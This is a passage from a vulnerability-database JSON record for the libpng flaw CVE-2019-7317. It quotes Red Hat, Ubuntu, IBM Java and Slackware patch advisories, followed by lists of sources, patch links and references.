Cross-origin theft of images with ImageBitmapRenderingContext\n1688200 - CVE-2019-5798 chromium-browser: Out of bounds read in Skia\n1712617 - CVE-2019-11691 Mozilla: Use-after-free in XMLHttpRequest\n1712618 - CVE-2019-11692 Mozilla: Use-after-free removing listeners in the event listener manager\n1712619 - CVE-2019-11693 Mozilla: Buffer overflow in WebGL bufferdata on Linux\n1712621 - CVE-2019-11698 Mozilla: Theft of user history data through drag and drop of hyperlinks to and from bookmarks\n1712622 - CVE-2019-9797 Mozilla: Cross-origin theft of images with createImageBitmap\n1712623 - CVE-2019-9800 Mozilla: Memory safety bugs fixed in Firefox 67 and Firefox ESR 60.7\n1712626 - CVE-2019-9817 Mozilla: Stealing of cross-domain images using canvas\n1712628 - CVE-2019-9819 Mozilla: Compartment mismatch with fetch API\n1712629 - CVE-2019-9820 Mozilla: Use-after-free of ChromeEventHandler by DocShell\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nthunderbird-60.7.0-1.el7_6.src.rpm\n\nx86_64:\nthunderbird-60.7.0-1.el7_6.x86_64.rpm\nthunderbird-debuginfo-60.7.0-1.el7_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nSource:\nthunderbird-60.7.0-1.el7_6.src.rpm\n\nppc64le:\nthunderbird-60.7.0-1.el7_6.ppc64le.rpm\nthunderbird-debuginfo-60.7.0-1.el7_6.ppc64le.rpm\n\nx86_64:\nthunderbird-60.7.0-1.el7_6.x86_64.rpm\nthunderbird-debuginfo-60.7.0-1.el7_6.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\nSource:\nthunderbird-60.7.0-1.el7_6.src.rpm\n\naarch64:\nthunderbird-60.7.0-1.el7_6.aarch64.rpm\nthunderbird-debuginfo-60.7.0-1.el7_6.aarch64.rpm\n\nppc64le:\nthunderbird-60.7.0-1.el7_6.ppc64le.rpm\nthunderbird-debuginfo-60.7.0-1.el7_6.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nthunderbird-60.7.0-1.el7_6.src.rpm\n\nx86_64:\nthunderbird-60.7.0-1.el7_6.x86_64.rpm\nthunderbird-debuginfo-60.7.0-1.el7_6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-18511\nhttps://access.redhat.com/security/cve/CVE-2019-5798\nhttps://access.redhat.com/security/cve/CVE-2019-7317\nhttps://access.redhat.com/security/cve/CVE-2019-9797\nhttps://access.redhat.com/security/cve/CVE-2019-9800\nhttps://access.redhat.com/security/cve/CVE-2019-9817\nhttps://access.redhat.com/security/cve/CVE-2019-9819\nhttps://access.redhat.com/security/cve/CVE-2019-9820\nhttps://access.redhat.com/security/cve/CVE-2019-11691\nhttps://access.redhat.com/security/cve/CVE-2019-11692\nhttps://access.redhat.com/security/cve/CVE-2019-11693\nhttps://access.redhat.com/security/cve/CVE-2019-11698\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-15/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXPWIu9zjgjWX9erEAQg21w//Z7v1kJQho28efeI70LrXGp/n0Hlj5i2m\nJwhPrwWDnz5BH5WbYrPIch/2CTL7znXR6v5rjisXoFhtvoSme3LPStyijp+bMXGr\nFtKnWFJRVt87gWZ8NwvY/mtwCjpIXSOCkAdEe6Rk+crG4gtBRct32ZDfcH+6U1Km\ncPpoguI0Q4cd/KZ4yiyFgUG66k0vBZ/mqUch480+vtlNkiO5JhZzPapTMEr5C9Ay\nqKmn6A98z3eVOpligYZ/5nAC4HfY6AhQp4CWFPijmvobJzq1a9z0XH4L9KeQk6RA\nlaW0+rzw9NcsSk4c5WMWlcl9YzzYSr663av26VIKwgUnMEGjmBKstSUfgYIBgu3j\nROMrVlHl2BTPJNrGtW0arWLo2pC0qCKEwcMGo8aisyNBLMc9QXFP4CCjf6uVtpU7\nVYfHz3bwfokj7R9dFDh3dDTmyrLeAWkoDckEmo59XEfXaA1u7E/QEAnxA4h9wCb3\nTU1frVhktXSh4lPO5JYIE4cpT50MJEyt2FPsSfQaL+q2EUMNlxR5IckSDx+sFicn\njSelaqnOEpJQSle2bLWAQmGgWeMMkyHbRReCjRMBYPt0F/qbFiKIvRJISEYlVb9L\nxpnYw8aTMn5OFxH2BCT/+mVniOhZYqPK8CfEF2dTKZ7hYtzammrzndSZf2ifG574\n3/xegYaen8Q=\n=TKs0\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6) - i386, x86_64\n\n3. ==========================================================================\nUbuntu Security Notice USN-3991-2\nJune 06, 2019\n\nfirefox regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.04\n- Ubuntu 18.10\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nUSN-3991-1 caused a regression in Firefox. The update caused a\nregression which resulted in issues when upgrading between Ubuntu\nreleases. This update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n Multiple security issues were discovered in Firefox. If a user were\n tricked in to opening a specially crafted website, an attacker could\n potentially exploit these to cause a denial of service, spoof the browser\n UI, trick the user in to launching local executable binaries, obtain\n sensitive information, conduct cross-site scripting (XSS) attacks, or\n execute arbitrary code. (CVE-2019-11691, CVE-2019-11692, CVE-2019-11693,\n CVE-2019-11695, CVE-2019-11696, CVE-2019-11699, CVE-2019-11701,\n CVE-2019-7317, CVE-2019-9800, CVE-2019-9814, CVE-2019-9817, CVE-2019-9819,\n CVE-2019-9820, CVE-2019-9821)\n \n It was discovered that pressing certain key combinations could bypass\n addon installation prompt delays. If a user opened a specially crafted\n website, an attacker could potentially exploit this to trick them in to\n installing a malicious extension. (CVE-2019-11697)\n \n It was discovered that history data could be exposed via drag and drop\n of hyperlinks to and from bookmarks. If a user were tricked in to dragging\n a specially crafted hyperlink to the bookmark toolbar or sidebar, and\n subsequently back in to the web content area, an attacker could\n potentially exploit this to obtain sensitive information. (CVE-2019-11698)\n \n A type confusion bug was discovered with object groups and UnboxedObjects. \n If a user were tricked in to opening a specially crafted website after\n enabling the UnboxedObjects feature, an attacker could potentially\n exploit this to bypass security checks. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nMozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance, and portability. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. 7) - x86_64\n\n3. Description:\n\nIBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit. \n\nSecurity Fix(es):\n\n* IBM JDK: Out-of-bounds access in the String.getBytes method\n(CVE-2019-11772)\n\n* IBM JDK: Failure to privatize a value pulled out of the loop by\nversioning (CVE-2019-11775)\n\n* OpenJDK: Insufficient checks of suppressed exceptions in deserialization\n(Utilities, 8212328) (CVE-2019-2762)\n\n* OpenJDK: Unbounded memory allocation during deserialization in\nCollections (Utilities, 8213432) (CVE-2019-2769)\n\n* OpenJDK: Missing URL format validation (Networking, 8221518)\n(CVE-2019-2816)\n\n* OpenJDK: Insufficient restriction of privileges in AccessController\n(Security, 8216381) (CVE-2019-2786)\n\n* libpng: use-after-free in png_image_free in png.c (CVE-2019-7317)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1672409 - CVE-2019-7317 libpng: use-after-free in png_image_free in png.c\n1730056 - CVE-2019-2769 OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432)\n1730099 - CVE-2019-2816 OpenJDK: Missing URL format validation (Networking, 8221518)\n1730255 - CVE-2019-2786 OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381)\n1730415 - CVE-2019-2762 OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328)\n1738547 - CVE-2019-11772 IBM JDK: Out-of-bounds access in the String.getBytes method\n1738549 - CVE-2019-11775 IBM JDK: Failure to privatize a value pulled out of the loop by versioning\n\n6. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] libpng (SSA:2019-107-01)\n\nNew libpng packages are available for Slackware 14.2 and -current to\nfix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/libpng-1.6.37-i586-1_slack14.2.txz: Upgraded. \n Fixed a memory leak in the ARM NEON implementation of png_do_expand_palette. \n Fixed a memory leak in pngtest.c. \n Fixed two vulnerabilities (CVE-2018-14048, CVE-2018-14550) in\n contrib/pngminus; refactor. \n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14048\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14550\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7317\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libpng-1.6.37-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libpng-1.6.37-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.6.37-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.6.37-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 package:\n829f6c020ad10fe9b09e94bceb7fae26 libpng-1.6.37-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\ne141813a42551a3c31df15b8495dc1a3 libpng-1.6.37-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n0f711d15bd85893a02f398b95b7d3f06 l/libpng-1.6.37-i586-1.txz\n\nSlackware x86_64 -current package:\nd8bdd5c1a73fa487c5f1a1a4b3ec2f63 l/libpng-1.6.37-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg libpng-1.6.37-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7317"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
},
{
"db": "BID",
"id": "108098"
},
{
"db": "VULMON",
"id": "CVE-2019-7317"
},
{
"db": "PACKETSTORM",
"id": "153157"
},
{
"db": "PACKETSTORM",
"id": "154285"
},
{
"db": "PACKETSTORM",
"id": "153212"
},
{
"db": "PACKETSTORM",
"id": "153067"
},
{
"db": "PACKETSTORM",
"id": "154457"
},
{
"db": "PACKETSTORM",
"id": "154282"
},
{
"db": "PACKETSTORM",
"id": "152561"
}
],
"trust": 2.61
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2019-7317",
"trust": 4.3
},
{
"db": "BID",
"id": "108098",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "152561",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "152664",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "152702",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.1877",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.1491",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4466",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0775",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.1454",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4293",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4381",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021042108",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201902-012",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-7317",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "153157",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154285",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "153212",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "153067",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154457",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154282",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7317"
},
{
"db": "BID",
"id": "108098"
},
{
"db": "PACKETSTORM",
"id": "153157"
},
{
"db": "PACKETSTORM",
"id": "154285"
},
{
"db": "PACKETSTORM",
"id": "153212"
},
{
"db": "PACKETSTORM",
"id": "153067"
},
{
"db": "PACKETSTORM",
"id": "154457"
},
{
"db": "PACKETSTORM",
"id": "154282"
},
{
"db": "PACKETSTORM",
"id": "152561"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-012"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
},
{
"db": "NVD",
"id": "CVE-2019-7317"
}
]
},
"id": "VAR-201902-0855",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.23809524
},
"last_update_date": "2026-03-09T23:19:31.919000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2019-116 Software product security information",
"trust": 0.8,
"url": "https://github.com/glennrp/libpng/issues/275"
},
{
"title": "Debian CVElist Bug Report Logs: libpng1.6: CVE-2019-7317: use-after-free in png_image_free in png.c",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ef2bbc82329f4e3dd9e23c0137af2a7b"
},
{
"title": "Ubuntu Security Notice: libpng1.6 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3962-1"
},
{
"title": "Debian Security Advisories: DSA-4435-1 libpng1.6 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d60ba88361ab9afdcad18ca2a106ac3b"
},
{
"title": "Red Hat: Important: java-1.7.1-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192494 - Security Advisory"
},
{
"title": "Red Hat: Important: java-1.7.1-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192495 - Security Advisory"
},
{
"title": "Arch Linux Advisories: [ASA-201904-10] libpng: denial of service",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201904-10"
},
{
"title": "Red Hat: Important: java-1.8.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192737 - Security Advisory"
},
{
"title": "Red Hat: CVE-2019-7317",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2019-7317"
},
{
"title": "Red Hat: Important: java-1.8.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192585 - Security Advisory"
},
{
"title": "Red Hat: Important: java-1.8.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192590 - Security Advisory"
},
{
"title": "Red Hat: Important: java-1.8.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192592 - Security Advisory"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2019-7317"
},
{
"title": "Red Hat: Important: thunderbird security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191308 - Security Advisory"
},
{
"title": "Red Hat: Important: thunderbird security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191310 - Security Advisory"
},
{
"title": "Red Hat: Critical: firefox security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191265 - Security Advisory"
},
{
"title": "Red Hat: Critical: firefox security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191269 - Security Advisory"
},
{
"title": "Red Hat: Important: thunderbird security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191309 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: openjdk-lts vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4083-1"
},
{
"title": "Red Hat: Critical: firefox security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191267 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: openjdk-8 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4080-1"
},
{
"title": "Ubuntu Security Notice: thunderbird vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3997-1"
},
{
"title": "Debian Security Advisories: DSA-4451-1 thunderbird -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=1cf7f39c2c474666174a69cf97b06740"
},
{
"title": "Ubuntu Security Notice: firefox regression",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3991-3"
},
{
"title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect AIX",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=61e62f4d9c861153c6391afc0ec560a4"
},
{
"title": "Debian Security Advisories: DSA-4448-1 firefox-esr -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e2d9ccf571c31c1011ad31af2798140f"
},
{
"title": "Ubuntu Security Notice: firefox regression",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3991-2"
},
{
"title": "Ubuntu Security Notice: firefox vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3991-1"
},
{
"title": "Arch Linux Advisories: [ASA-201905-8] thunderbird: multiple issues",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-8"
},
{
"title": "Amazon Linux 2: ALAS2-2019-1246",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2019-1246"
},
{
"title": "Mozilla: Mozilla Foundation Security Advisory 2019-14",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2019-14"
},
{
"title": "IBM: IBM Security Bulletin: Multiple Mozilla Firefox vulnerability in IBM SONAS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4a8e20a238934bc47ca332a3c76cc9c3"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Command Suite, Hitachi Automation Director, Hitachi Configuration Manager and Hitachi Infrastructure Analytics Advisor",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2019-117"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (January 2020v2)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=acad3ac1b2767940a01b72ed1b51586b"
},
{
"title": "Arch Linux Advisories: [ASA-201905-9] firefox: multiple issues",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201905-9"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2019-116"
},
{
"title": "Amazon Linux 2: ALAS2-2019-1229",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2019-1229"
},
{
"title": "Mozilla: Security vulnerabilities fixed in Firefox ESR 60.7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=554d832b08166d6d04a53f3c421e7f9b"
},
{
"title": "IBM: IBM Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU \u2013 Jul 2019 \u2013 Includes Oracle Jul 2019 CPU affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=de7b9859dff396513e72da22ffc4ab3e"
},
{
"title": "Mozilla: Mozilla Foundation Security Advisory 2019-15",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2019-15"
},
{
"title": "Mozilla: Security vulnerabilities fixed in Thunderbird 60.7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=198e3a670ab8c803584e801da3919e61"
},
{
"title": "IBM: IBM Security Bulletin: Multiple vulnerabilities may affect IBM\u00ae SDK, Java\u2122 Technology Edition",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=836b059f33e614408bd51705b325caaf"
},
{
"title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b352b6737bfbf2a62b0a2201928e8963"
},
{
"title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Cloud Manager with OpenStack",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1ad5c6091de269fb79e0c4d1c06b0846"
},
{
"title": "Mozilla: Security vulnerabilities fixed in Firefox 67",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=730fce689efe63b7de803de0d8794796"
},
{
"title": "Mozilla: Mozilla Foundation Security Advisory 2019-13",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2019-13"
},
{
"title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Release 1801-z",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4ef3e54cc5cdc194f0526779f9480f89"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7317"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-416",
"trust": 1.0
},
{
"problemtype": "Use of freed memory (CWE-416) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
},
{
"db": "NVD",
"id": "CVE-2019-7317"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.9,
"url": "http://packetstormsecurity.com/files/152561/slackware-security-advisory-libpng-updates.html"
},
{
"trust": 2.6,
"url": "https://www.debian.org/security/2019/dsa-4435"
},
{
"trust": 2.4,
"url": "https://usn.ubuntu.com/3962-1/"
},
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/108098"
},
{
"trust": 2.3,
"url": "https://www.debian.org/security/2019/dsa-4451"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7317"
},
{
"trust": 2.0,
"url": "https://github.com/glennrp/libpng/issues/275"
},
{
"trust": 2.0,
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=12803"
},
{
"trust": 2.0,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2019:1269"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2019:1309"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2019:2585"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2019:2592"
},
{
"trust": 1.8,
"url": "https://access.redhat.com/errata/rhsa-2019:2737"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/apr/30"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/apr/36"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/3991-1/"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/may/56"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/may/59"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2019/dsa-4448"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00032.html"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:1265"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:1267"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/may/67"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00038.html"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/3997-1/"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00002.html"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:1310"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:1308"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00029.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00084.html"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20190719-0005/"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/4080-1/"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/4083-1/"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/201908-02"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:2494"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:2495"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00044.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00038.html"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:2590"
},
{
"trust": 1.7,
"url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbst03977en_us"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.4,
"url": "https://access.redhat.com/security/cve/cve-2019-7317"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672409"
},
{
"trust": 0.6,
"url": "https://github.com/glennrp/libpng/issues/275exploitissue trackingthird party advisory"
},
{
"trust": 0.6,
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=12803mailing listthird party advisory"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193060-1.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1096270"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1106139"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1106487"
},
{
"trust": 0.6,
